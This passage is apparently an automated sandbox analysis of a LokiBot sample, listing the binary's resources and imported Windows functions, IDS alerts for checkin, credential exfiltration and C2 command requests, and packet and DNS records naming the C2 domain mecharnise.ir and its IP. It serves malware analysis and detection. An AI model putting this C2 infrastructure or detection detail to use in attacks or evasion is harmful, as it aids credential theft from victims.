                    RT_CURSOR0x8c96c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8cb780x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8cd840x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x8cf900x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8d19c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8d3a80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8d5b40x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8d7c00x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8d9cc0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x8dbd80x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8dde40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8dff00x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x8e1fc0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8e4080x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8e6140x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8e8200x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x8ea2c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8ec380x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8ee440x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8f0500x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8f25c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8f4680x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x8f6740x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8f8800x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8fa8c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8fc980x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8fea40x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x900b00x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x902bc0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x904c80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x906d40x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x908e00x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x90aec0x20cOpenPGP Public KeyEnglishUnited States1.0133587786259541
                    RT_CURSOR0x90cf80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x90f040x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x911100x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x9131c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x915280x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x917340x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x919400x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x91b4c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x91d580x20cDOS executable (COM, 0x8C-variant)EnglishUnited States1.0133587786259541
                    RT_CURSOR0x91f640x20cOpenPGP Public KeyEnglishUnited States1.0114503816793894
                    RT_CURSOR0x921700x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x9237c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x925880x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x927940x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x929a00x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x92bac0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x92db80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x92fc40x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x931d00x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x933dc0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x935e80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x937f40x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x93a000x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x93c0c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x93e180x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x940240x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x942300x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x9443c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x946480x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x948540x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x94a600x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x94c6c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x94e780x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x950840x20cdataEnglishUnited States0.683206106870229
                    RT_CURSOR0x952900x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_CURSOR0x9549c0x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_CURSOR0x956a80x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_CURSOR0x958b40x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_CURSOR0x95ac00x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_CURSOR0x95ccc0x20cNon-ISO extended-ASCII text, with very long lines (524), with no line terminatorsEnglishUnited States0.02862595419847328
                    RT_BITMAP0x95ed80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                    RT_BITMAP0x960a80x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                    RT_BITMAP0x9628c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                    RT_BITMAP0x9645c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                    RT_BITMAP0x9662c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                    RT_BITMAP0x967fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                    RT_BITMAP0x969cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                    RT_BITMAP0x96b9c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                    RT_BITMAP0x96d6c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                    RT_BITMAP0x96f3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                    RT_BITMAP0x9710c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                    RT_ICON0x971f40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.11819887429643527
                    RT_DIALOG0x9829c0x52data0.7682926829268293
                    RT_STRING0x982f00x22cdata0.38489208633093525
                    RT_STRING0x9851c0x318data0.3787878787878788
                    RT_STRING0x988340x1ecdata0.34959349593495936
                    RT_STRING0x98a200x13cStarOffice Gallery theme r, 1761637120 objects, 1st A0.5537974683544303
                    RT_STRING0x98b5c0x288AmigaOS bitmap font "a", fc_YSize 25344, 17152 elements, 2nd "n", 3rd "l"0.45524691358024694
                    RT_STRING0x98de40x16cdata0.5741758241758241
                    RT_STRING0x98f500xe8data0.5905172413793104
                    RT_STRING0x990380x128data0.5574324324324325
                    RT_STRING0x991600x2c8data0.45786516853932585
                    RT_STRING0x994280x410data0.3951923076923077
                    RT_STRING0x998380x374data0.3947963800904977
                    RT_STRING0x99bac0x434data0.3587360594795539
                    RT_STRING0x99fe00x138data0.47435897435897434
                    RT_STRING0x9a1180xecdata0.538135593220339
                    RT_STRING0x9a2040x228data0.4855072463768116
                    RT_STRING0x9a42c0x3b8data0.3172268907563025
                    RT_STRING0x9a7e40x3acdata0.37553191489361704
                    RT_STRING0x9ab900x2c4data0.4067796610169492
                    RT_RCDATA0x9ae540x10data1.5
                    RT_RCDATA0x9ae640x270data0.7483974358974359
                    RT_RCDATA0x9b0d40x37aDelphi compiled form 'TForm1'0.5898876404494382
                    RT_RCDATA0x9b4500xe5dataEnglishUnited States1.0480349344978166
                    RT_GROUP_CURSOR0x9b5380x14Lotus unknown worksheet or configuration, revision 0x11.25
                    RT_GROUP_CURSOR0x9b54c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                    RT_GROUP_CURSOR0x9b5600x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x9b5740x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x9b5880x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x9b59c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x9b5b00x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_ICON0x9b5c40x14dataEnglishUnited States1.1
                    DLLImport
                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    kernel32.dlllstrcpyA, WriteFile, WaitForSingleObjectEx, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitThread, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PtVisible, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                    user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    kernel32.dllSleep
                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                    comdlg32.dllGetOpenFileNameA
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.3185.8.173.8149698802825766 08/06/23-05:17:06.418971TCP2825766ETPRO TROJAN LokiBot Checkin M24969880192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149696802024312 08/06/23-05:17:03.087617TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969680192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149695802825766 08/06/23-05:17:01.315449TCP2825766ETPRO TROJAN LokiBot Checkin M24969580192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149695802025381 08/06/23-05:17:01.315449TCP2025381ET TROJAN LokiBot Checkin4969580192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149697802024313 08/06/23-05:17:04.705698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969780192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149697802825766 08/06/23-05:17:04.705698TCP2825766ETPRO TROJAN LokiBot Checkin M24969780192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149696802021641 08/06/23-05:17:03.087617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969680192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149696802825766 08/06/23-05:17:03.087617TCP2825766ETPRO TROJAN LokiBot Checkin M24969680192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149697802021641 08/06/23-05:17:04.705698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969780192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149698802025381 08/06/23-05:17:06.418971TCP2025381ET TROJAN LokiBot Checkin4969880192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149695802021641 08/06/23-05:17:01.315449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969580192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149698802021641 08/06/23-05:17:06.418971TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969880192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149697802025381 08/06/23-05:17:04.705698TCP2025381ET TROJAN LokiBot Checkin4969780192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149698802024313 08/06/23-05:17:06.418971TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969880192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149696802025381 08/06/23-05:17:03.087617TCP2025381ET TROJAN LokiBot Checkin4969680192.168.2.3185.8.173.81
                    192.168.2.3185.8.173.8149695802024312 08/06/23-05:17:01.315449TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969580192.168.2.3185.8.173.81
                    • Total Packets: 52
                    • 80 (HTTP)
                    • 53 (DNS)
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 6, 2023 05:17:01.188846111 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:01.307549953 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:01.308022022 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:01.315448999 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:01.434638977 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:01.434931993 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:01.551456928 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.663739920 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.663810015 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.663861036 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.663907051 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.663938046 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.663954973 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.664000988 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.664004087 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.664052963 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.664083004 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.664083004 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.664098024 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.664122105 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.664139032 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.664186954 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.664210081 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.671616077 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.671716928 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.779683113 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.779752970 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.779772043 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.779800892 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.779820919 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.779869080 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.780461073 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.780509949 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.780533075 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.780555964 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.780576944 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.780600071 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.780605078 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.780654907 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.780657053 CEST8049695185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:02.780708075 CEST4969580192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:02.972542048 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:03.084685087 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:03.084804058 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:03.087616920 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:03.200795889 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:03.200908899 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:03.311866999 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.342906952 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.342981100 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343031883 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343079090 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343079090 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343127012 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343141079 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343174934 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343223095 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343230963 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343251944 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343274117 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343276978 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343313932 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.343329906 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.343373060 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.347848892 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.347950935 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.452892065 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.452958107 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.452986002 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453006983 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453052998 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453066111 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453087091 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453099012 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453146935 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453149080 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453149080 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453191996 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453216076 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453236103 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453272104 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453279018 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453301907 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453327894 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453336954 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453373909 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453382969 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453419924 CEST8049696185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.453428984 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.453641891 CEST4969680192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.582442999 CEST4969780192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.702852964 CEST8049697185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.703109980 CEST4969780192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.705698013 CEST4969780192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.824738026 CEST8049697185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:04.825086117 CEST4969780192.168.2.3185.8.173.81
                    Aug 6, 2023 05:17:04.942775965 CEST8049697185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:05.892899036 CEST8049697185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:05.892971992 CEST8049697185.8.173.81192.168.2.3
                    Aug 6, 2023 05:17:05.893019915 CEST8049697185.8.173.81192.168.2.3
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 6, 2023 05:17:01.029077053 CEST5799053192.168.2.38.8.8.8
                    Aug 6, 2023 05:17:01.178920031 CEST53579908.8.8.8192.168.2.3
                    Aug 6, 2023 05:17:02.831532955 CEST5238753192.168.2.38.8.8.8
                    Aug 6, 2023 05:17:02.971050024 CEST53523878.8.8.8192.168.2.3
                    Aug 6, 2023 05:17:04.436194897 CEST5692453192.168.2.38.8.8.8
                    Aug 6, 2023 05:17:04.580930948 CEST53569248.8.8.8192.168.2.3
                    Aug 6, 2023 05:17:06.147397041 CEST6062553192.168.2.38.8.8.8
                    Aug 6, 2023 05:17:06.291480064 CEST53606258.8.8.8192.168.2.3
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Aug 6, 2023 05:17:01.029077053 CEST192.168.2.38.8.8.80xbd34Standard query (0)mecharnise.irA (IP address)IN (0x0001)false
                    Aug 6, 2023 05:17:02.831532955 CEST192.168.2.38.8.8.80x8050Standard query (0)mecharnise.irA (IP address)IN (0x0001)false
                    Aug 6, 2023 05:17:04.436194897 CEST192.168.2.38.8.8.80xbb79Standard query (0)mecharnise.irA (IP address)IN (0x0001)false
                    Aug 6, 2023 05:17:06.147397041 CEST192.168.2.38.8.8.80x1decStandard query (0)mecharnise.irA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Aug 6, 2023 05:17:01.178920031 CEST8.8.8.8192.168.2.30xbd34No error (0)mecharnise.ir185.8.173.81A (IP address)IN (0x0001)false
                    Aug 6, 2023 05:17:02.971050024 CEST8.8.8.8192.168.2.30x8050No error (0)mecharnise.ir185.8.173.81A (IP address)IN (0x0001)false
                    Aug 6, 2023 05:17:04.580930948 CEST8.8.8.8192.168.2.30xbb79No error (0)mecharnise.ir185.8.173.81A (IP address)IN (0x0001)false
